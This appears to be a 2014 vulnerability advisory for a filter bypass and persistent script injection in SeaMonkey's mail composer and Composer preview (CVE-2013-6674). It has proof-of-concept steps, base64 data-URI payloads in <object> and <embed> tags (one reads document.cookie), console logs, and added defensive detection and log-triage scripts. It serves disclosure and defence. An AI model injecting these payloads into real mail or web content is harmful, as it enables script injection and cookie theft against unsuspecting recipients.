Document Title:
===============
Mozilla SeaMonkey - Filter Bypass & Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=967
Mozilla Bug Tracking ID: 881686
http://www.vulnerability-lab.com/get_content.php?id=953
Mozilla Bug Tracking ID: 875818
Exclusive News: (Partners) http://news.softpedia.com/news/Critical-Validation-and-Filter-Bypass-Vulnerability-Fixed-in-Thunderbird-420962.shtml
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6674
CVE-ID:
=======
CVE-2013-6674
Release Date:
=============
2014-01-29
Vulnerability Laboratory ID (VL-ID):
====================================
967
Common Vulnerability Scoring System:
====================================
7.3
Product & Service Introduction:
===============================
SeaMonkey is a free and open source cross-platform Internet suite. It is the continuation of the former Mozilla Application Suite,
based on the same source code. The development of SeaMonkey is community-driven, in contrast to the Mozilla Application Suite, which
until its last released version (1.7.13) was governed by the Mozilla Foundation. The new project-leading group is the SeaMonkey Council.
SeaMonkey consists of a web browser (SeaMonkey Navigator), which is a descendant of the Netscape family, an e-mail and news client
program (SeaMonkey Mail & Newsgroups, which shares code with Mozilla Thunderbird), an HTML editor (SeaMonkey Composer) and an IRC
client (ChatZilla). The software suite supports skins. It comes with two skins in the default installation, Modern and Classic.
Mail
Mail features include support for multiple accounts, junk mail detection, message filters, HTML message support, a dictionary,
an address book, customizable labels, add-ons and mail views, as well as integration with the rest of the suite.
Composer
Figure: SeaMonkey Composer 2.16 running on Ubuntu 12.04.
SeaMonkey Composer is a WYSIWYG HTML editor. Its main user interface features four tabs: Normal (WYSIWYG), HTML tags, HTML code,
and browser preview. The generated code is HTML 4.01 Transitional. As of version 1.1.13, SeaMonkey Composer supports basic text
formatting and styling, insertion of hyperlinks and images, and the creation of tables. It does not support the addition of form
elements (text fields, check boxes, and buttons). SeaMonkey Composer is scheduled to be updated with the release of KompoZer 0.8,
which is currently under development.
Vendor Homepage: http://www.mozilla.org
Product website: http://www.seamonkey-project.org/releases/seamonkey2.17/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a filter bypass and persistent validation web vulnerability in the Mozilla Seamonkey application.
Vulnerability Disclosure Timeline:
==================================
2013-05-10: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2013-05-11: Vendor Notification (Mozilla Security Incident Team)
2013-05-21: Vendor Response/Feedback (Mozilla Security Incident Team)
2014-01-18: Vendor Fix/Patch (Mozilla Developer Team - Reward 1.500$ SWB)
2014-01-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Mozilla
Product: Seamonkey 2.17.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
Since SeaMonkey uses Mozilla Thunderbird at the backend for its mail client, it is prone to the same persistent vulnerability
that I had reported earlier to the Mozilla Security Team.
I will include the details again in this advisory for your reference and ease.
Basically, after attaching a debugger to the SeaMonkey binary, it was initially noticed that malicious JavaScript tags were being
filtered/blocked. By default, HTML tags like <script> and <iframe> are blocked in SeaMonkey and get filtered immediately upon
insertion. However, while drafting a new email message, attackers can easily bypass the current input filters by base64-encoding
their payloads and using the <object> tag to insert malicious scripts/code (e.g. script/frame) within the email, then send it to
the victims. The exploit gets triggered once the victim decides to reply and clicks the `Reply` or `Forward` button.
After successfully bypassing the input filters, an attacker can inject persistent script code while writing a new email and send
it to victims. Interestingly, the payload gets filtered in the initial viewing mode; however, if the victim clicks Reply or
Forward, the exploit executes successfully. For a POC I will be including multiple examples in this advisory for your review.
I was able to run multiple scripts generating strange behaviour in the application, which can be seen in the debugging errors
I have attached along with this report.
These sorts of vulnerabilities can result in multiple attack vectors on the client end, which may eventually result in complete
compromise of the end user system. The persistent code injection vulnerability is located within the main application. Exploitation
of this persistent application vulnerability requires low or medium user interaction. Successful exploitation of the vulnerability
may result in malicious script code being executed in the victim's browser, resulting in script code injection, persistent phishing,
client-side redirects and similar client-side attacks.
Vulnerable Service(s):
[+] Seamonkey 2.17.1 - Latest Release
Vulnerable Section(s):
[+] Compose (Compose in HTML)
[+] Email Signature (Mail & Newsgroups Account Settings)
[+] Attach File with Signature as HTML (Mail & Newsgroups Account Settings)
Proof of Concept (PoC):
=======================
The validation and filter bypass vulnerability can be exploited by remote attackers without a privileged application user account
and without direct user interaction. To demonstrate or reproduce the vulnerability, follow the steps and information provided below.
Proof of Concept #1
a) Create a new email message (Compose in HTML)
b) In the body text, insert a new HTML tag with the POC "Payload"
c) Send the email to the victim (your test email account)
d) Open the new email in the victim's browser and click Reply
e) You should now see a JavaScript Application popup window proving the existence of this vulnerability.
Proof of Concept #2
a) Go to Edit and then Mail & Newsgroups Account Settings
b) Under the Signature Text, insert the Payload and enable 'Use HTML'
c) Close the menu and click on "Compose" (Compose in HTML) to create a new email
d) You should get a popup the moment the new email editor window opens, proving the existence of this vulnerability.
Proof of Concept #3
a) Create a new text file on your desktop (local computer), insert the POC payload and save it as test.html (HTML)
b) Go to Edit and then Mail & Newsgroups Account Settings
c) Below the Signature Text box, enable 'Attach the signature from a file instead'
d) Click Choose and select the 'test.html' file which you created in step a.
e) Click on "Compose" (Compose in HTML) and you should be able to see the JavaScript popup proving the existence of this vulnerability.
Payload #1
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydChkT2NVbWVOdC5Db29LaWUpOzwvc2NyaXB0Pg=="></object>
Payload #2
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5
L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlZ1bG5lcmFi
bGUiKTs8L3NjcmlwdD48L3N2Zz4=" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
1.3 POC Technical Description:
Here, we used the data URI payload as the value assigned to the 'data' attribute of the 'object' tag. The <object> tag is used to include objects
such as images, audio, videos, Java applets, ActiveX, PDF, and Flash. The 'data' attribute of the object tag defines a URL that refers to the
object's data. Data in the "data:" URI is encoded as a base64 string:
Base64-encoded payload: PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg==
Base64-decoded payload: <script>alert("Vulnerable");</script>
When the browser loads the object tag, it loads the object (in our case, JavaScript) assigned to its data attribute, which causes our
JavaScript to execute. We were able to bypass the application's blacklist filter because the payload was base64-encoded, so the literal
<script> tag that the filter blocks never appears in the markup itself.
2.0 Seamonkey HTML Composer Preview - Input Filter Bypass Vulnerability
Details:
By default, HTML tags like <script> with alert/prompt are filtered in the Composer preview feature; however, using the <object> and/or
<embed> tags with base64-encoded payloads it is possible to bypass the current filters and execute script code. I did notice that once
you save it as an .html file, all normal payloads like <script>alert(1)</script> work. It's an HTML composer, so maybe it is not meant
to filter any dangerous/malicious code by default, and I am definitely not challenging that fact at all. I just felt it is important to
highlight that if all other tags are being blocked in the preview, then this one actually bypasses the current Seamonkey Composer
preview filters and still works.
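The mechanism described in section 1.3 and again for the Composer preview above is the same in both places: a blacklist that looks for literal tags such as <script> never sees a payload that arrives base64-encoded inside a data: URI on an <object> or <embed>. The Node.js script below is an added example, not code from this advisory or from Mozilla; the function names are its own, and the two sample inputs are the payloads quoted in this advisory. It shows a naive blacklist passing both payloads, a content-aware check that decodes every data: URI and flags the script inside, and an allowlist-style strip that removes the hosting elements and any data: URL attribute outright.

```javascript
// Added example (not code from the advisory or from Mozilla): why a literal-tag
// blacklist misses base64 "data:" URIs carried by <object>/<embed>, and how a
// content-aware check plus an allowlist-style strip closes that gap.
// Node.js built-ins only; every function name here is this example's own.

// The two payloads quoted in the advisory, reproduced as sample input. The
// EMBED one is kept in its line-wrapped form to show whitespace handling.
const PAYLOAD_OBJECT =
  '<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>';
const PAYLOAD_EMBED =
  '<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov\n' +
  'L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5\n' +
  'L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw\n' +
  'IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlZ1bG5lcmFi\n' +
  'bGUiKTs8L3NjcmlwdD48L3N2Zz4=" type="image/svg+xml" AllowScriptAccess="always"></EMBED>';

// 1. A literal-tag blacklist of the kind the advisory describes. It never sees
//    the <script> hidden inside the base64 body, so both payloads pass it.
function blacklistBlocks(html) {
  return /<\s*(script|iframe)\b/i.test(html);
}

// 2. Collect the values of src= and data= attributes (object, embed, img, ...).
//    Quoted values may span lines, as the wrapped EMBED payload does, so any
//    whitespace inside the value is removed before it is interpreted.
function extractUrlAttributes(html) {
  const re = /\b(?:src|data)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const values = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    values.push((m[1] ?? m[2] ?? m[3]).replace(/\s+/g, ''));
  }
  return values;
}

// 3. Decode a data: URI. base64 bodies are decoded as such, anything else is
//    percent-decoded; the media type is returned so callers can allowlist it.
function decodeDataUri(uri) {
  const comma = uri.indexOf(',');
  if (comma < 0) return { mediaType: '', decoded: '' };
  const header = uri.slice('data:'.length, comma);
  const body = uri.slice(comma + 1);
  const isBase64 = /;base64$/i.test(header);
  const mediaType = header.replace(/;base64$/i, '').split(';')[0].toLowerCase();
  const decoded = isBase64
    ? Buffer.from(body, 'base64').toString('utf8')
    : decodeURIComponent(body);
  return { mediaType, decoded };
}

// 4. Content-aware check: flag any data: URI whose decoded body carries active
//    content (script tags, event handlers, javascript: URLs), regardless of
//    what the outer markup looks like.
function inspectHtml(html) {
  const findings = [];
  for (const value of extractUrlAttributes(html)) {
    if (!/^data:/i.test(value)) continue;
    const { mediaType, decoded } = decodeDataUri(value);
    if (/<\s*script\b|\bon\w+\s*=|javascript\s*:/i.test(decoded)) {
      findings.push({ mediaType, decoded });
    }
  }
  return { blacklistBlocks: blacklistBlocks(html), findings };
}

// 5. Allowlist-style hardening: drop the elements that can host a nested
//    document outright, then drop any remaining data: URL attribute. A real
//    sanitizer should do this on a parsed DOM rather than with regexes.
function stripActiveEmbeds(html) {
  const withoutHosts = html
    .replace(/<\s*(object|embed|script|iframe)\b[^>]*>[\s\S]*?<\/\s*\1\s*>/gi, '')
    .replace(/<\s*(object|embed|script|iframe)\b[^>]*\/?>/gi, '');
  return withoutHosts.replace(
    /\s(?:src|data|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi,
    (attr, dq, sq, bare) =>
      /^data:/i.test((dq ?? sq ?? bare).replace(/\s+/g, '')) ? '' : attr
  );
}

// Usage: both payloads slip past the blacklist but are caught once decoded.
for (const html of [PAYLOAD_OBJECT, PAYLOAD_EMBED]) {
  const r = inspectHtml(html);
  console.log(r.blacklistBlocks, r.findings.map((f) => `${f.mediaType}: ${f.decoded}`));
  console.log('after strip:', JSON.stringify(stripActiveEmbeds(html)));
}
```

The point of steps 4 and 5 is the order of trust: a filter that reasons about the outer markup alone cannot decide whether an <object> or <embed> is safe, because the element's content is whatever the URI decodes to. Either decode and inspect (step 4, useful for detection), or refuse nested documents and data: URLs in mail and editor contexts altogether (step 5, the simpler rule to get right).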
Vulnerable Product(s):
[+] Seamonkey 2.17.1 - Latest Release
Vulnerable Module(s):
[+] Composer (CTRL+4)
Vulnerable Section(s):
[+] HTML Source
2.1 Proof of Concept:
a) Open a new Seamonkey Composer window
b) Go to <HTML> Source
c) Copy/paste any one of the payloads mentioned under the "Payload" section anywhere in the code before the </body> tag.
Example code that I used for this POC:
<html>
<head>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="Content-Type">
<title>testtesttest</title>
</head>
<body>
<br>
<h4> </h4>
<h2> <object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>
</h2>
</body>
</html>
d) Click on Preview and you should be able to see a JavaScript popup proving the existence of this filter bypass vulnerability.
Payload #1
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>
Payload #2
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5
L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlZ1bG5lcmFi
bGUiKTs8L3NjcmlwdD48L3N2Zz4=" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
2.3 Interesting Raw Application Logs captured during the entire process of testing:
[JavaScript Error: "ReferenceError: dOcUmeNt is not defined" {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkT2NVbWVOdC5Db29LaWUpOzwvc2NyaXB0Pg==" line: 1}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkT2NVbWVOdC5Db29LaWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg==" line: 0}]
ModLoad: 6fcd0000 6fce2000 C:\Windows\SysWOW64\dhcpcsvc.DLL
ModLoad: 6fcc0000 6fccd000 C:\Windows\SysWOW64\dhcpcsvc6.DLL
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "Unknown property '-moz-border-radius-bottomleft'. Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius-topleft'. Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius-topright'. Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius-bottomright'. Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Error in parsing value for 'filter'. Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius'. Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-box-shadow'. Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown pseudo-class or pseudo-element '-ms-clear'. Ruleset ignored due to bad selector." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
ModLoad: 139d0000 13a21000 C:\Windows\SysWOW64\WINSPOOL.DRV
(1af0.258c): Unknown exception - code 000006ba (first chance)
[JavaScript Error: "NS_ERROR_NOT_INITIALIZED: Component returned failure code: 0xc1f30001 (NS_ERROR_NOT_INITIALIZED) [nsIEditor.selectionController]" {file: "chrome://navigator/content/urlbarBindings.xml" line: 107}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "WARN addons.updates: Update manifest for [email protected] did not contain an updates property" {file: "resource://gre/modules/AddonUpdateChecker.jsm" line: 312}]
[JavaScript Warning: "WARN addons.updates: Update manifest for {972ce4c6-7e08-4474-a285-3208198ce6fd} did not contain an updates property" {file: "resource://gre/modules/AddonUpdateChecker.jsm" line: 312}]
versioncheck.addons.mozilla.org : server does not support RFC 5746, see CVE-2009-3555
versioncheck.addons.mozilla.org : server does not support RFC 5746, see CVE-2009-3555
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Warning: "The character encoding declaration of the HTML document was not found when prescanning the first 1024 bytes of the file. When viewed in a differently-configured browser, this page will reload automatically. The encoding declaration needs to be moved to be within the first 1024 bytes of the file." {file: "file:///C:/Users/John%20Doe/Desktop/testtesttest.html" line: 5}]
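For triaging console output like the above, a small parser of the `[JavaScript Error: "..." {file: "..." line: N}]` format is enough to separate the noise (chrome:// and resource:// errors, CSS warnings from a web page) from the entries that matter for this bug: those whose `file` is a data: document, which is exactly where the decoded payload ran, and which the "framed document" encoding warnings also point at. The script below is an added example, not part of the advisory or of any Mozilla tooling; it uses Node.js built-ins only, the sample lines are copied from the log above, and the function names are this example's own.

```javascript
// Added example (not code from the advisory or from Mozilla): parse the Error
// Console entries quoted in this advisory and pull out the ones that came from a
// data: document, i.e. the entries that show where the decoded payload ran.
// Node.js built-ins only; the function names are this example's own.

// Sample lines copied from the advisory's log; the ModLoad line is debugger
// output in the same capture and must be skipped by the parser.
const SAMPLE_LOG = `
[JavaScript Error: "ReferenceError: dOcUmeNt is not defined" {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkT2NVbWVOdC5Db29LaWUpOzwvc2NyaXB0Pg==" line: 1}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==" line: 0}]
ModLoad: 6fcd0000 6fce2000 C:\\Windows\\SysWOW64\\dhcpcsvc.DLL
[JavaScript Warning: "WARN addons.updates: Update manifest for {972ce4c6-7e08-4474-a285-3208198ce6fd} did not contain an updates property" {file: "resource://gre/modules/AddonUpdateChecker.jsm" line: 312}]
`;

// One Error Console entry: [JavaScript <level>: "<message>" {file: "<url>" line: <n>}]
const ENTRY_RE = /^\[JavaScript (Error|Warning): "([\s\S]*?)" \{file: "([^"]*)" line: (\d+)\}\]$/;

// Parse a single line; anything that is not a console entry (ModLoad lines,
// debugger exceptions) yields null so callers can filter it out.
function parseConsoleLine(line) {
  const m = ENTRY_RE.exec(line.trim());
  if (!m) return null;
  const file = m[3];
  return {
    level: m[1],
    message: m[2],
    file,
    line: Number(m[4]),
    scheme: file.slice(0, file.indexOf(':')).toLowerCase(),
  };
}

// Decode the body of a data: URL so the analyst sees the document that ran.
function decodeDataUrlBody(url) {
  const body = url.slice(url.indexOf(',') + 1);
  return /;base64,/i.test(url)
    ? Buffer.from(body, 'base64').toString('utf8')
    : decodeURIComponent(body);
}

// Summarise a console dump: entry count per URL scheme, plus every entry that
// originated in a data: document, with that document decoded.
function triageConsoleLog(text) {
  const entries = text.split('\n').map(parseConsoleLine).filter(Boolean);
  const byScheme = {};
  for (const e of entries) byScheme[e.scheme] = (byScheme[e.scheme] || 0) + 1;
  const dataDocuments = entries
    .filter((e) => e.scheme === 'data')
    .map((e) => ({ level: e.level, message: e.message, decoded: decodeDataUrlBody(e.file) }));
  return { total: entries.length, byScheme, dataDocuments };
}

// Usage
const report = triageConsoleLog(SAMPLE_LOG);
console.log(report.byScheme);
for (const d of report.dataDocuments) {
  console.log(`${d.level}: ${d.message}\n  document that ran: ${d.decoded}`);
}
```

Two things fall out of the triage for this log: the `ReferenceError: dOcUmeNt is not defined` entry decodes to the first payload, confirming that script inside the data: document actually executed (JavaScript identifiers are case-sensitive, so the mixed-case spelling failed at run time rather than being filtered), and the repeated "framed document" encoding warnings with a data: `file` mark each point at which a payload document was loaded, which is a usable indicator when reviewing such consoles after the fact.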
Solution - Fix & Patch:
=======================
2014-01-18: Vendor Fix/Patch (Mozilla Developer Team - Reward 1.500$ SWB)
Security Risk:
==============
The security risk of the persistent input validation and input filter bypass vulnerabilities is estimated as high(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan [[email protected]] [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: [email protected] - [email protected] - [email protected]
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.
Copyright © 2014 | Vulnerability Laboratory